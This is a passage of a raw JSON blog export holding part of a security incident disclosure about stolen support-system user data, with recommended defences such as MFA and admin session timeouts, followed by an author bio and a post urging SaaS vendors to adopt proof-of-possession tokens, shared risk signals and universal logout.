Login\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Full Name\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Username\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Email\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Company Name\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Type\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Address\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"[Date of] Last Password Change or Reset\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role: Name\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role: Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phone\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mobile\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Time Zone\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SAML Federation ID\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The majority of the fields in the report are blank and the report does not include user credentials or sensitive personal data. For 99.6% of users in the report, the only contact information recorded is full name and email address.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we do not have direct knowledge or evidence that this information is being actively exploited, there is a possibility that the threat actor may use this information to target Okta customers via phishing or social engineering attacks. Okta customers sign-in to Okta’s customer support system with the same accounts they use in their own Okta org. Many users of the customer support system are Okta administrators. It is critical that these users have multi-factor authentication (MFA) enrolled to protect not only the customer support system, but also to secure access to their Okta admin console(s).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given that names and email addresses were downloaded, we assess that there is an increased risk of phishing and social engineering attacks directed at these users. While 94% of Okta customers already require MFA for their administrators, we recommend ALL Okta customers employ MFA and consider the use of phishing resistant authenticators to further enhance their security. Please refer to product documentation to enable MFA for the admin console (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Classic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How we discovered this\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Following the publication of the RCA on November 3, Okta Security reviewed our initial analysis of the actions that the threat actor performed, including manually recreating the reports that the threat actor ran within the customer support system. We identified that the file size of one particular report downloaded by the threat actor was larger than the file generated during our initial investigation. After additional analysis, we concluded that the report contained a list of all customer support system users. The discrepancy in our initial analysis stems from the threat actor running an unfiltered view of the report. Our November review identified that if the filters were removed from the templated report, the downloaded file was considerably larger - and more closely matched the size of the file download logged in our security telemetry.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also identified additional reports and support cases that the threat actor accessed, which contain contact information of all Okta certified users and some Okta Customer Identity Cloud (CIC) customer contacts, and other information. Some Okta employee information was also included in these reports. This contact information does not include user credentials or sensitive personal data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are working with a third-party digital forensics firm to validate our findings and we will be sharing the report with customers upon completion.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementing recommended best practices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend all customers immediately take the following actions to defend against potential attacks that target their Okta administrators.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication (MFA): We strongly recommend all Okta customers secure admin access using MFA at a minimum. We also strongly encourage customers to enroll administrative users in phishing resistant authenticators (such as Okta Verify FastPass, FIDO2 WebAuthn, or PIV/CAC Smart Cards) and to enforce phishing resistance for access to all administrative applications. Please refer to product documentation to enable MFA for the admin console (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Classic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admin Session Binding: As communicated in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident RCA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", customers can now enable an Early Access feature in Okta that requires admins to reauthenticate if their session is reused from an IP address with a different ASN (Autonomous System Number). Okta strongly recommends customers enable this feature to further secure admin sessions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admin Session Timeout: To align with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-4/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST AAL3\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" guidelines and increase the security posture of every customer, Okta is introducing Admin Console timeouts that will be set to a default of 12-hour session duration and a 15-minute idle time. Customers will have the option to edit these settings. This will be available as an Early Access feature starting November 29th for preview orgs and December 4th for production orgs. The feature will be available for all production orgs by January 8th, 2024. An email was sent to all Super Admins regarding this change on November 27th, and a copy of that communication can be found in the Knowledge Base article: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/admin-session-lifetime-idle-timeout-security-enhancements?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admin Session Lifetime/Idle Timeout Security Enhancements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Awareness: In addition, Okta customers should be vigilant of phishing attempts that target their employees and especially wary of social engineering attempts that target their IT Help Desks and related service providers. We recommend Okta customers implement our industry-leading, phishing-resistant methods for enrollment, authentication, and recovery. Please see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/architecture/pr/pr-overview.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Solutions for Phishing Resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for more information on protecting your organization from phishing. We also strongly recommend that customers review their IT Help Desk verification processes and ensure that appropriate checks, such as visual verification, are performed before performing high risk actions such as password or factor resets on privileged accounts.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:58:03.276Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"
David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/appsofthefuture","id":"92b98b26-b960-5b29-ae4a-459590cf7e01","title":"How to Secure the SaaS Apps of the Future","date":"2024-03-05T06:42:25+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few years we’ve observed a fundamental shift in the threat model for highly targeted organizations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, if an attacker can’t manage to steal user credentials for highly targeted organizations, they will pivot to instead stealing a user’s proof of authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attackers will use malware to steal session tokens from a user’s browser after they sign in. They may similarly use transparent proxies to steal session tokens from a user’s browser after they sign in. And as Okta’s recent experience shows, if bearer tokens of any kind are stored unprotected, attackers will sniff them out. Stolen session tokens can often be replayed in a browser of the attacker’s choosing for the remaining duration of the user session.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For several years Okta has contributed to internet standards that aim to mitigate the theft and replay of session tokens. We are taking these actions because we cannot assume that the current solutions to these problems (endpoint protection and phishing resistant authentication) will always be applied effectively. It is prudent to assume that some malware will go undetected by endpoint protection solutions, or that some users will sign in to applications without the protection of phishing-resistant authenticators. When either of these events happen, defenders require an ability to limit the blast radius from a stolen session token.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our goals here are threefold:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We need to constrain the use of tokens that are for specific devices, clients and/or locations,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We need the identity ecosystem (identity providers and SaaS applications) to autonomously exchange signals about changes in session risk, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We need the means to act on identified changes in session risk: such as forcing step-up authentication within the context of an application, or signing a user out of all of their application sessions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has demonstrated, in response to an October security incident, that modern applications supporting OIDC (OpenID Connect) can meet many of these goals. Okta now binds Admin Sessions to location (ASN, by default and optionally by IP), forcing re-authentication when an administrative user changes location mid-session or attempts to perform critical, security-sensitive tasks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next challenge for Okta is to apply the same hardening techniques used for the Okta Admin Console to the innumerable third-party SaaS applications that our customers gate behind Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have laid the groundwork for several innovative new features that every enterprise SaaS application needs to embrace to protect users in the era of post-authentication attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enterprise-ready requirements for today’s SaaS apps\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today there are a handful of non-negotiable requirements SaaS applications must meet before a Chief Security Officer (CSO) would consider them to be enterprise-ready.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single Sign-On (via support for OIDC or SAML)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Provisioning and deprovisioning (via support for SCIM)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Programmatic access to logs (using REST APIs)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, most CSOs haven’t updated the requirements they demand from SaaS applications for at least 5-10 years. And during that time, we have observed fundamental changes in both the nature of the applications we are protecting, and in the threat posed to SaaS applications from post-authentication attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enterprise-ready requirements for the Apps of the Future\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today’s SaaS application is typically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2020/06/the-path-to-continuous-authentication-solving-the-best-of-breed-problem/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"more than a simple web app\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". For example, consider Slack. Slack is a distributed set of apps and services, encompassing both web and native application experiences, and integrated with other applications (e.g. Google Workspace, Atlassian Confluence and Jira) using OAuth. Securing these distributed applications requires a new, longer list of requirements. SaaS applications will (at the very least) need to support the three features detailed below to pass muster with CSOs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Proof-of-possession\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Proof-of-Possession is a method of constraining the use of OAuth access tokens to an authorized client (browser-based app).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It prevents attackers from replaying a stolen token from any other client.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has addressed this requirement via our support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/dpop/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", an OAuth 2.0 extension that developers of SaaS applications can use to cryptographically bind a token to an authorized client. If an access token issued to one client is intercepted by an attacker, and replayed on any other client, the SaaS application can deny access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are a few logical reasons why this problem should be solved at the application level using DPoP. Previous efforts to solve this problem at the transport level (using mTLS-based token binding) have encountered \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://textslashplain.com/2023/10/23/protecting-auth-tokens/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"scale, deployability and usability challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Trusted Platform Modules (TPMs) have historically not been fast enough to sign a proof for every HTTP request, and end-to-end proofs are also problematic in enterprise environments where proxies and other intermediaries terminate TLS.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"DPoP, by contrast, will reduce the risk of a stolen token across the broadest possible number of modern native apps. Okta has enabled DPoP by default in all \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/oin-api-service-overview/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that access Okta’s management APIs. Once configured, Okta API endpoints will require the bearer of a token to prove this cryptographic relationship to an authorized client.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chief Security Officers should be demanding that SaaS applications do the same. Consider the following requirement in your vendor security questionnaire:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must require cryptographic proof that a client presenting an access token was authorized (demonstrating Proof-of-Possession).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Continuous Access Evaluation Profile (CAEP)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta recently reduced the default maximum duration and idle duration for administrative sessions in Okta in an effort to shift the industry towards “secure by default” principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Counterintuitively, the default session for most SaaS applications is getting longer.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From a security perspective, organizations can only afford to extend the life of application sessions if security teams are confident that they can detect changes in user risk mid-session, and in near real time, orchestrating immediate responses to those signals in ways that don’t create excessive friction for legitimate users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/02/unifying-efforts-amplifying-security-shared-signals-interoperability/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Continuous Access Evaluation Profile (CAEP)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" offers a path forward. CAEP provides a standardized way of ensuring that a change in session risk identified by one SaaS application can autonomously create responses in every other SaaS application accessed by the user via their Identity Provider.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, there are numerous risk signals Identity Providers like Okta can observe in relation to changes in user and session risk. But these signals aren’t always observable by the downstream SaaS applications accessed during an Okta session. SaaS applications can also observe changes in user and session risk, and again, many of which aren’t always observable to the Identity Provider.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Continuous Access Evaluation profile (CAEP), which uses the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/wg/sharedsignals/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Shared Signals Framework\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" standardized by the OpenID Foundation, is a publish/subscribe mechanism for describing changes in user, device, or session risk. Okta has built the necessary components to be a transmitter, receiver and aggregator of risk signals between applications, and is building an ecosystem of SaaS applications and security providers to exchange signals with.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Risk signals are already published and acted on by customers using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2023/10/identity-threat-protection-with-okta-ai-is-transforming-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Threat Protection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in limited early access. Now is the time for CSOs to demand SaaS applications support the same risk sharing standards. Consider the following requirement in your vendor security questionnaire:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must be able to transmit and subscribe to risk signals using open, industry standard frameworks.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With all the signals being exchanged using CAEP, security teams also need the ability to automate responses to heightened session risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One possible response would be for the SaaS application to trigger re-authentication when responding to a change in session risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the observed risk meets an appropriately high threshold, the user’s IdP (Identity Provider) session and each of the user’s individual sessions with SaaS applications need to be revoked.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Up until now, there hasn’t been a simple way to do this. Single Logout (SLO) offered a partial solution. A user can log out of a SaaS application that supports SLO and be automatically signed out of their Identity Provider (IdP) session. The missing piece was a method of revoking ALL the connected SaaS applications a user authorized during a IdP session, including native apps and SaaS integrations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enter \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/oin-universal-logout-overview/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a standardized method Okta has proposed to handle the “Single Sign-Out” problem. Universal Logout saves SecOps personnel the hassle of manually identifying and signing out users from each SaaS application accessed during a risky session.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CSOs need to demand that SaaS applications publish a Universal Logout endpoint to facilitate this process. Consider the following requirement in your vendor security questionnaire:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must publish a standard interface for revoking access to an application, including OAuth tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do these requirements move the needle?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When more applications meet these requirements:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Users can only authenticate to an enterprise resource with a phishing-resistant authenticator from the right device(s),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications will only accept requests from the right users with the right permissions,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sessions/tokens for web or native apps can only be used from the same device authorized to access them,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Long-lived sessions are continuously re-evaluated for risk using signals from the enterprise and the application,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All access from all devices can be terminated in real-time to limit the blast radius of a stolen session.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As the world’s largest independent and app-neutral Identity Provider, Okta is positioned to help organizations and application service providers meet these requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has the unique position of being able to influence the ability of the next generation of SaaS applications to enable these features with the check of a box (in the Customer Identity Cloud), and to provide a market for the next generation of B2B SaaS applications to reach workforce users via the Okta Integration Network. Okta has also enabled application integration wizards to help SaaS applications to retrofit these features.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security teams need to demand more from the SaaS ecosystem to solve these fundamental security challenges.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS Apps of the Future - Requirement 